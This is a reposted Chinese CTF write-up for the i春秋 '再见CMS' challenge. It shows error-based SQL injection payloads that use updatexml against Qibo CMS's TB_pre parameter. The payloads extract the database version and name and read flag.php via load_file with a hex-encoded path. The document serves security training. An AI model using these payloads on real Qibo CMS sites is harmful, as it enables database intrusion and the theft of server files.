再见CMS

最新推荐文章于 2024-07-17 12:52:39 发布
最新推荐文章于 2024-07-17 12:52:39 发布
阅读量174 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/wosun/p/11241040.html
版权

观察网站最下方,根据备案号搜到这是个齐博CMS,然后百度就可以搜到齐博CMS漏洞了

然后开始利用

首先尝试了在用户信息修改处进行注入,发现好像想不通了,就在博客界面进行注入

Payload

获取版本信息

http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=(select%20*%20from%20information_schema.tables%20where%201=2%20or%20(updatexml(1,concat(0x7e,(select%20version()),0x7e),1)))a%23

获取数据库名称

http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=(select%20*%20from%20information_schema.tables%20where%201=2%20or%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1)))a%23

然后获取表,列,数据信息,发现并没有我们想要的flag,所以说flag不在这里

根据标题提示

flag可能跟之前一样在/var/www/html/flag.php

然后使用select load_file函数试了试select load_file("/var/www/html/flag.php")select load_file(‘/var/www/html/flag.php’),发现 ’ 在被提交时会转变成 \’

“ 同样

所以这里不能使用 ’  ” 了,改为16进制

0x2F7661722F7777772F68746D6C2F666C61672E706870

构造payload

http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=(select%20*%20from%20information_schema.tables%20where%201=2%20or%20(updatexml(1,concat(0x7e,(%20select%20mid((select%20load_file(0x2F7661722F7777772F68746D6C2F666C61672E706870)),1,32)%20),0x7e),1)))a%23

通过不断不断更改1的值得到flag

flag{f50c0fa3-e1f3-4a81-8563-6f1f02ed4588}

 

转载于:https://www.cnblogs.com/wosun/p/11241040.html

weixin_30535167
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[百度杯]九月场 再见CMS writeup
Flyour的博客
04-05 1900
再见CMS 拿到链接是一个博客网站,对于这样的题目: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 这是该网站的登录页面,根据这个登录页面和下方的备案号、版权声明的格式都可以判断出这是个齐博cms。 下面是齐博CMS的整站系统:http://v7.qibosof...
i春秋 “百度杯”CTF比赛 九月场 再见CMS
include_heqile的博客
09-11 2316
https://www.ichunqiu.com/battalion?t=1&r=0 这道题刚做的时候是没有头绪的,看了一眼writeup,得知要通过网站下方的备案记录来查询除网站相关信息,并进而得知该网站所使用的的cms,但是我照着做的时候却查不出来结果,ICP/IP官网返回说无匹配信息,于是我就参考writeup直接搜索了齐博CMS的相关漏洞,我使用的是这一个: http://0d...
“百度杯”CTF比赛 九月场_再见CMS(齐博cms)
a173262565的博客
04-18 282
题目在i春秋ctf大本营 又是一道cms的题,打开御剑一通乱扫,发现后台登录地址,访问一看妥妥的齐博cms 记得以前很久以前利用一个注入通用漏洞,这里我贴上链接,里面有原理与利用方法详细说明: 齐博cms_userinfo注入 按照这个思路,我们先在首页注册test1账号并登录,直接访问注入的页面, 先按照之前的套路进行测试: 访问用户信息发现成功执行,说...
再见织梦CMS
小戴站长_一个关于互联网知识的博客
12-07 851
从2011年开始接触织梦CMS,一直到2021年,用织梦建站长达10年之久,而就在前段时间,织梦CMS突然发布需要授权收费,并且在收集证据,于是很多站长纷纷转换程序,从此和织梦CMS说拜拜。 织梦CMS之所以被站长用的多,主要原因是织梦CMS手册全,模板多,非常容易上手,适合新手学习使用,因此才被大量的用于企业建站,但是其缺点也是非常的明显,BUG多,容易被黑,并且修复不及时,近几年很少升级,不懂代码的小白建站很容易被黑掉。 然而织梦CMS的突然授权收费,只能让站长纷纷转到其他CMS去,很少有人去授权,
i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1524
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
APPCMS 2.0
04-30
APPCMS的面世,解决了建站数据的更新问题,挖掘了搜索引擎的长尾流量,为更多的APP开发者提供了被用户了解的机会。 APPCMS 2.0 更新日志:2015年6月27日 1,Appcms喜获天使投资,从2.0版本开始所有功能全部免费...
大米CMS 6.1.1
04-30
大米CMS是一个免费开源的,快速、简单的面向智能手机等移动终端的网站CMS系统,自动生成手机安装包APK.并提供终端消息推送,手机版后台管理等功能。大米CMS 6.1.1 更新日志:2020-03-061.增加管理员操作日志,不可...
cms管理系统
12-06
CMS(Content Management System)管理系统是一种基于Web的软件平台,它允许非技术人员通过用户友好的界面来创建、编辑和管理网站内容。CMS系统的核心功能包括内容创作、版本控制、权限管理、搜索功能、模板设计和...
CMS-Hunter
01-08
Content Management System Vulnerability Hunter
苹果cms下载
12-05
苹果CMS是一款广泛应用于网站搭建的开源内容管理系统(CMS),尤其适用于视频网站的建设。它的名称“苹果CMS”可能源于其简洁、高效的特性,类似于苹果公司的产品理念。此系统以其易用性、稳定性和丰富的功能而受到...
i春秋-百度杯九月场-YeserCMS
qq_44657899的博客
02-23 1383
首先,拿到这种cms的题, 1,要先判断是什么类型的cms 2,搜索这种cms的漏洞。 3,利用该漏洞 一,判断cms: 1,在该站内找找有没有什么标识,这道题的标识在下载处有cmseasy 2,搜索手机版 - 购物车 - 留言 - 繁体 - 注册 / 登陆,可以在网上找到一大堆相同cms的网站。 在下方找到了cms名字: 3,看到这里有详细的信息,百度一下。 二,查找easycms...
i春秋CTF-“百度杯”CTF比赛 九月场-再见CMS
苟有恒,必有三更眠,五更起。
11-01 998
1 信息收集 拿到CMS搭的站, 首先需要确定网站使用的是何种CMS,百度得到该CMS为齐博CMS的整站系统:http://v7.qibosoft.com/ image 接下来,收集信息,该CMS出现过哪些漏洞: 齐博整站/地方门户SQL注入漏洞 2 漏洞利用 简而言之,治理在修改信息时,有一个SQL注入漏洞。 接下来,我根据大佬的描述,写pa...
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
最新发布
12年全栈程序开发
07-17 209
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1287
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
PHP基础语法
红客网络编程与渗透技术
07-15 254
下面,我们提供了一个简单的 PHP 文件实例,它可以向浏览器输出文本 "Hello World!PHP 中的每个代码行都必须以分号结束。分号是一种分隔符,用于把指令集区分开来。通过 PHP,有两种在浏览器输出文本的基础指令:echo 和 print。PHP 脚本在服务器上执行,然后将纯 HTML 结果发送回浏览器。PHP 文件通常包含 HTML 标签和一些 PHP 脚本代码。PHP 脚本以
PHP小课堂】学习PHP中的字符串操作函数(三)
硬核项目经理
07-15 782
学习PHP中的字符串操作函数(三)继续我们的 PHP 中字符串函数的学习之旅。今天我们要学习的内容是除了 str_ 和 str 开头之外的其它函数,这些函数也有很多非常好玩的内容,让我们赶快进入主题吧。分隔、打断字符串关于这个分割字符串并成为数组,或者是反过来的将数组组合成字符串的功能来说,implode() 和 explode() 这两个函数真的是出镜率非常的高。所以它们的使用也不用我多做介绍了...
php 实现栈
huanghm88的专栏
07-16 342
可以根据需要使用这些方法来操作栈。类,其中包含了入栈()和判断栈是否为空(
CMS7000安全防范系统用户手册
"CMS7000用户手册详细介绍了博世报警软件CMS7000的使用方法和系统构成,包括安全防范系统的组成、工作原理、安装、启动、操作员登录、参数设置、报警主机管理、用户与防区管理、报警监控处理、巡更管理、数据库安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值